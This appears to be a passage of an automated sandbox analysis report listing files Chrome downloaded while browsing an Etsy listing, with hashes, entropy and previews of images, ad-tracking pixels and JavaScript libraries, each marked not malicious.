                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9F3A0479CF73247B2CF4EF5DA58C797E
                                                                                                                                                                              SHA1:EF2F0C8A7B394121AF559FFF6AAE81258D5D2B34
                                                                                                                                                                              SHA-256:6BDAEBCCD0BAEF271870BEE1D19E28B20061FE9A62A148E6AA28DC98F123FE2C
                                                                                                                                                                              SHA-512:F429C55559DB6263F39377F26BFE576E0BF10041316A89BA02EF852AAB23E94BEC387BB00611D5617893E65C59B1AB6FAF905D136CC9066286F628BB1283EB4B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................U.........................!1.AQ.."aq..2..B....#R..3br....$C..Ss...4ct...%De..&'57f................................2......................!1.AQ."aq.2.B..R..#3b..C..............?.....(.P.B....)X.... ..(P..B.k...E...I..M...`w....).i.M.b......d......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                              Entropy (8bit):2.7773627950641693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                              SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                              SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                              SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://td.doubleclick.net/td/rul/658194373?random=1729505310914&cv=11&fst=1729505310914&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Decorative%20Pendant%2C%20Ghost%2C%20Helloween%20Decoration%2C%20Children%27s%20Room%20Decoration%2C%20Milk%20Color%20-%20Etsy&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
                                                                                                                                                                              Preview:<html></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):53147
                                                                                                                                                                              Entropy (8bit):7.995678978886913
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BC8C74FE6268F48AF6FA6E3713177C35
                                                                                                                                                                              SHA1:899C1B3C56007BECBF67CEF6B445DEC3B5282F72
                                                                                                                                                                              SHA-256:BCA152D5B53A70DB0BC57D6BF841AD597E28A0F55CAF61F3C2A9EF8B3A72C7A0
                                                                                                                                                                              SHA-512:23874E54528818B9847FC4D4BB2C511682E02525DBC8CAA93BDC998DEA328904EAB7B5EAC49635DC703D3A0522A541F94FD7FCFFBF9463BE12CE393833CB923E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/16295684/r/il/cf2307/2616316241/il_600x600.2616316241_qhqw.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................mdat.....&ey_.....2....p.E.Q@.3~.....i............xF.......$......W~..!7...e.vn...... ......VZ.Xz?m..'<e.?x.:..L..M..D.....!.u.*..A........|..1.B...R.9.......|.....UzUfQ........e~f..^.t].D.....{....i}lV.:Q..)i.I..<...)..[7....F.01VWo..N"..y.|5.}ut.L.V.F.!I..0.t..0...}...1!.. .].0...........LE.....v.;......xuK.(.......2*Or......9......_{.8v[....s..).~.:.Zu>.V.a.7.%.y.F.@...s..F.~F[..f....R..[.W..=B...".D|!a..3...,.f......x.>..0MyT...Z..#...!WJ.^..gq_.\..N..;..i..l.0l..[..=.._.m.G..@.i...'a..T.E7y..QI..Xl'h.[.8.e.....fm.Ck4.FU..*nq.;....nE.o.%.';._...G...C....P0..p......P.mv&=..vM..z.5.n.......J....n%.t.J..;.....z5qFK.x.*........8._v.........3.PsR.i(...............=.0hzK....0?.C
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):63390
                                                                                                                                                                              Entropy (8bit):7.964160901391082
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B47821F8F61F77EB5263B935C9198EE9
                                                                                                                                                                              SHA1:1688509613C4860AFFFFDF4A3B1ED7535707743D
                                                                                                                                                                              SHA-256:C51563644C4832AAC5992BA367D3DE172384A77CDC83F11FE5322047701EF8CA
                                                                                                                                                                              SHA-512:B0B944814156800236D2F03A0D8A9E061831BC222DE6E37C0B7DA1F211B6927AAD7DA8223ABC2829B91BB34B8EC331AAC456832DC7364672DCF1D13380458389
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................G......................!.1..AQa"q..2.....#BR...3b...$r...%.CS4DTcs....................................7.......................!1.A.Qaq.".....2.#BRCS.$3...c.............?...u....`...)...i$.&.c.hu5....1..A><.+..tpA...P/S>.g..&..>&..\2..'..?.......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):181425
                                                                                                                                                                              Entropy (8bit):4.745588365519616
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:15FFED3C4DB6F43600EFADB594A9C75B
                                                                                                                                                                              SHA1:E722835075577BBDB66866A94803F54777DA463A
                                                                                                                                                                              SHA-256:3BB845631D6FCB38332885DD27A26408E49B2DA6567240AF18B3DA6138DCB198
                                                                                                                                                                              SHA-512:8CDA80539BC62C9B78AC793517CDAE9E24DC19B182CDCD9D1FD64C6BA80BA21089967C627F244E7E44AF985074D534649375E0492E06526C1FF901E20CF9908D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:/* Prototype JavaScript framework, version 1.7. * (c) 2005-2010 Sam Stephenson. *. * Prototype is freely distributable under the terms of an MIT-style license.. * For details, see the Prototype web site: http://www.prototypejs.org/. *. *--------------------------------------------------------------------------*/./**. * IMPORTANT: When upgrading this script you must fix the stack overflow error. * It happens on the submissions page. In order to fix that error just change all "defer"s to "p_defer". * defer name is already used in Ext.js and it causes problems on Internet explorer. */.var Prototype = {.. Version: '1.7',.. Browser: (function(){. var ua = navigator.userAgent;. var isOpera = Object.prototype.toString.call(window.opera) == '[object Opera]';. return {. IE: !!window.attachEvent && !isOpera,. IE9: ('documentMode' in document) && document.documentMode == 9,. IE10: ('documentMode' in document) && document.documentMode
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60849
                                                                                                                                                                              Entropy (8bit):7.957011090320191
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:DC58A358545D8A2E1BC9C9DD862A4DC5
                                                                                                                                                                              SHA1:90598E1AA164D0073DA9D6540030EBF38FF18FCE
                                                                                                                                                                              SHA-256:669F683DE39928EE8A0CD8C40109A34BC1238F92410F543FE798E253DB8A4E41
                                                                                                                                                                              SHA-512:FA75EB57BA54C5FFC1E0A3340A63CC493946526C4B39F81DED925A82972F0DCFF37E092A4CA741AF768628AFF3E83114E9E2BA8D82BB7E1319FBE5CCD79FFD03
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................F......................!..1.A."Qaq...2...#B...Rb...3.$r.4S...C.c%DT.................................6......................!1..AQa2q."..#3BRb..r..4.CS.$.............?.wM............f>..?....i..|;j...G.}..I.}..]..v#.{..+B7.0U,.z..L.e...l....`.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (738)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1365
                                                                                                                                                                              Entropy (8bit):5.5637793668529465
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:EA424EB364F56C034B02EA2C33698C1B
                                                                                                                                                                              SHA1:89029DB2DCB5E71FF2098727A76E384F1DAB4CCE
                                                                                                                                                                              SHA-256:17411986E2D53A84A01C6636E5545264F49294886A1BEBEE5A8E7EE442FBDC6A
                                                                                                                                                                              SHA-512:2E100F51A170254609CC37442B25FB8CF915A76AEFE44F31A8B085336D3E1E88EC711F19DD153B99942A201CA92E64A2299EFC0ECD1F5FD6C73B5852C1C00B16
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://8666735.fls.doubleclick.net/activityi;dc_pre=CLDp1K6dn4kDFec5VQgduP47dQ;src=8666735;type=count0;cat=etsy_000;ord=1;num=8314600452759;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1103244455;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script src="https://js.adsrvr.org/up_loader.1.1.0.js" type="text/javascript"></script>. <script type="text/javascript">. ttd_dom_ready( function() {. if (typeof TTDUniversalPixelApi === 'function') {. var universalPixelApi = new TTDUniversalPixelApi();. universalPixelApi.init("r09jr34", ["c6e9qnb"], "https://insight.adsrvr.org/track/up");. }. });. </script><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CLDp1K6dn4kDFec5VQgduP47dQ;src=8666735;type=count0;cat=etsy_000;ord=1;num=8314600452759;npa=0;auiddc=*;ps=1;pcor=1103244455;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1702
                                                                                                                                                                              Entropy (8bit):6.69988142924488
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:64B607F8017A21F1955E70554C336E40
                                                                                                                                                                              SHA1:0F7066F445E7C3A3B9232816B0EE34CF05E8252D
                                                                                                                                                                              SHA-256:FA845E8020367B33591BD3B370F159AFCFBC9FED5D123DA0994FD5E152CEC90E
                                                                                                                                                                              SHA-512:794A007417ECE7FE23A1D0FBE07915E96DC54D767FA64A54D6410B61E6D49E92998A0E09E149FF047144582DDAE99BC869806086DC5074B7BB324204C0C2AD0F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......2.2.."........................................2...........................!1."AQaq...2...#%BE.................................'........................!Aq."1..#.QRa............?.|b....j..6..(..Y\\...Q....*....nm.S.om-%uMR&..G.z..ub=z.U.J.rYjKk.tx...s9Q<R....<J=...CE.4K]WU....4..4.Y.b..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (487)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):488
                                                                                                                                                                              Entropy (8bit):4.841686487844174
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2775054C068B37509E0798448F7FD32C
                                                                                                                                                                              SHA1:8CCB907373C30EB3B98D5A24EC92141A938F09F5
                                                                                                                                                                              SHA-256:484EF4268F1D679C1AE88C06FC2388D39AFC441465732617E5E2CDC2E3D418E2
                                                                                                                                                                              SHA-512:5423F06453EA452614E21391C098D252DDB65ABC958C02664D9B6F1BD3BAD858B396B053C57AA714391C8953F849FAC3B6ECB9AA0C4F74F4FB81C1242B485EB4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:var TTDCM = function () { function n(t) { var e = "iframe_" + this.mapIndex++, i = document.createElement("iframe"); i.setAttribute("id", e), i.setAttribute("allowTransparency", !0), i.setAttribute("height", 0), i.setAttribute("width", 0), i.setAttribute("src", t), document.body.appendChild(i) } this.init = function (t) { if (this.sslOnly = "https:" == location.protocol, void 0 !== t && null != t && 0 != t.length) for (var e = t.length, i = this.mapIndex = 0; i < e; i++)n(t[i]) } };.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61131
                                                                                                                                                                              Entropy (8bit):7.959975536127471
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CEAE5F30509510FB25D73EAC596ABB52
                                                                                                                                                                              SHA1:89C2C431D97F2840E9B3254AFC42AAAC4A821BA9
                                                                                                                                                                              SHA-256:1C85AD2469956C9DB907439C1EFB18A12EB2FE66A14BF7747248E0C67F723B0A
                                                                                                                                                                              SHA-512:4192C40E45E137486D8174A6DD1A358748716FE97B6008269E0CE813B21BDFFDA8B87FDF46F7F784CA1416E35E7A57B823C0EEE462A966F101850BC01DD4B4B0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................G......................!...1AQa.."q2....B...#R..$3br...C...%4S.DTc..s5................................8.......................!.1AQ..a.."q.2RS..#3B..Cbr..$..............?...H$..O.Z'.F'h.pQ.\..=........L.v.P:....;...n\.'.B..."{".......p.{D....{..S
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):19495
                                                                                                                                                                              Entropy (8bit):7.985929534279014
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A23EC0E2FFCE991D047CEB2FDEB5F058
                                                                                                                                                                              SHA1:B7F76FF1565733816027EA0BD9A5EA0A89CA9340
                                                                                                                                                                              SHA-256:CA7D36CBAB619098D1CFA1624A594D2FAC9A1699CB8C970BEC84A5ECF20FF1E8
                                                                                                                                                                              SHA-512:3C800305C5CF6C6AB2DBDA61653299A7ADDC4B68963F3DF12A66EA90E61DB9BFB1DFC15C93247FF53151E274CD674DF9264EE1247F1EE9724FC3BFD25FA79B0D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/7a556d/6020881299/il_340x270.6020881299_7gnb.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................K....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................K!mdat....."*p...h4 2........1@..A_?..}...p...U.:.e~..c.n..2.(.:t.7..g.&{...L.>....O..\Lq......26~J......z62.....Q0.....~......n.i....X...J4;d)....y...<.w..5}.....].....[..4..V....d@.~M.^..G...9....}fQ......%.~..m......v...&$H#^.[.....,Et=y......r....t.%H.1...Vs....h...; .......bA.....n.5.6[J. .l;._.....V<....Y......*I...%.....^z}.2.....c2w...R.I!b....N.E.R`6...Q..Q.?.N.).J....0.....`..G....Q...[z.................n.zm.N.....$.*..DJ..$.l.C...%...Y.Z.._.o...^......7..%C0.Mg..k..1...........B~./...I...-.+.$]m #6.&a_.u.G;Z..=...........kr.j...'^|..nTN...t..[......c^Cw...W..$..Z;.]...3..v.m].z..[.0.a.p....1J.#}^@.\P...R..;..hj~.a..y..E.s(...,...,..}..7... ...-.~.-...8..L.Vg..sk..........q..~V.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (4103), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4103
                                                                                                                                                                              Entropy (8bit):5.573234278412048
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:16D5D552603D86726AE439FC61299D42
                                                                                                                                                                              SHA1:42E252A7AF04292577789C2DF07D88EF749A2B4C
                                                                                                                                                                              SHA-256:9CA07DF45944B8440AE6241E4A017DB2B6E4600E5F647D3180C96877198C3552
                                                                                                                                                                              SHA-512:F26A316E1D94DE19317113B75E1292AB1410D471E5F68BB24F93485F550B486AE6CB7EF9AF0B09F2A5AD4B3B57217A3A726BDA4265B8E0B22CF1E32296ACB2CD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://ct.pinterest.com/static/ct/token_create.js
                                                                                                                                                                              Preview:!function(t){var r={};function i(n){var e;return(r[n]||(e=r[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,i),e.l=!0,e)).exports}i.m=t,i.c=r,i.d=function(n,e,t){i.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},i.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},i.t=function(e,n){if(1&n&&(e=i(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)i.d(t,r,function(n){return e[n]}.bind(null,r));return t},i.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return i.d(e,"a",e),e},i.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},i.p="",i(i.s=0)}([function(n,e,t){var r,i,t=t(1);try{r="A7JYkbIvWKmS8mWYjXO12SIIsfPdI7twY91Y3LWOV/YbZmN1ZhYv8O+Zs6/IPCfBE99aV9tIC8sWZSCN09vf7gkAAACWey
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):57248
                                                                                                                                                                              Entropy (8bit):7.996473028491067
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:10A03EF417FDCAB711352DCD3E75C7FA
                                                                                                                                                                              SHA1:3263B871AAC5DCB852EDA99EB4311D5E02FF5F8A
                                                                                                                                                                              SHA-256:AF2B0DB190A4381F657D09E14B037A3D44446D9F66B150C568E3340B4D0A3E3E
                                                                                                                                                                              SHA-512:C8ABA19617E619E42F2767F8A11E172BB2C900A5A4EE9A953F3AEAD741CA70D7AEFD41A8DE2D69145868E74654D7AB81786B4FA92B9E77AFFECDC04DCF800347
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/95693a/5747854913/iap_600x600.5747854913_7u2ionmw.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................mdat.....&ey_.....2........1@...S0.O|....N?..{7..8..B...n..K.........(u....C...9.L..N.=.3....}_..?.'Z. ........g..<. b......gBt.rO)...r.`I...D...<..k+x.y....]~<..........Qb.0;..].H8...g......lm.C.....p...%\....X.E.~TViN...7$.....b...l..Y.MIJ.)...F5.~.1..%6. ^..@...L...1i..{O"...El...P=6...9..k...?.?......8.>..Z.A.=...9}.....+.3..\..z...gs..<.X.}......f..]...Z..r..KK._|.@l..a..^*.....*.E..<...XR...'..mc....S0/ki.B...!......%Z..S.....Z9~6..6.-r.d.......rk~....q=A....E....\.......JqX...)h..UsT8..]B..h.90...v.P.....5&+..n?....4;qy!........V....J...S....]\....eL6.tJ{.A_.c._...ktfUd.......`..@qG.B6.A*QrkB.......zl.e=&..V...N...^..`..0q...(...4...1......."NE..Yg...,.Z..........weS....9.....c.......[yO.Cb.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (445)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):618
                                                                                                                                                                              Entropy (8bit):5.377928030861339
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D9DE3782919091053861B1D5D5AC1DF9
                                                                                                                                                                              SHA1:FE1A4C738D5F1759887A8E462C721427C0711F7F
                                                                                                                                                                              SHA-256:A65347790F2EF9AA3EB78B2832526A7B1244EA7F0BCB9E32510D870D51567658
                                                                                                                                                                              SHA-512:EA658D071EBD0C3946C221D5BC46EEACBDF0408FDFA9706D4E36AAC4F85CF6005360BA9EC2E0FEE31FC75EF9A8F4DA84E44314EB3558D2089536514770F9E89D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/async/core-marketplace/auto/listzilla/responsive/collage_dependencies.bccfea020beb03c10953.js
                                                                                                                                                                              Preview:"use strict";(self["jsonp-core-marketplace"]=self["jsonp-core-marketplace"]||[]).push([[7262],{77694:(e,t,o)=>{o.r(t);o.d(t,{default:()=>p});var r=o(45788);var a=o(4009);var n=o(21337);const s=function(){const e="popover-shop-promo-description";const t=document.getElementById(e);t&&new n["default"](t)};const c=s;var l=o(84577);const p={WtPopover:r["default"],WtContentToggle:a["default"],ShopOverviewPromoOverlay:c,WtTabList:l["default"]}}}]);.//# sourceMappingURL=https://www.etsy.com/sourcemaps/evergreenVendor/en-US/async/core-marketplace/auto/listzilla/responsive/collage_dependencies.bccfea020beb03c10953.js.map
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):54611
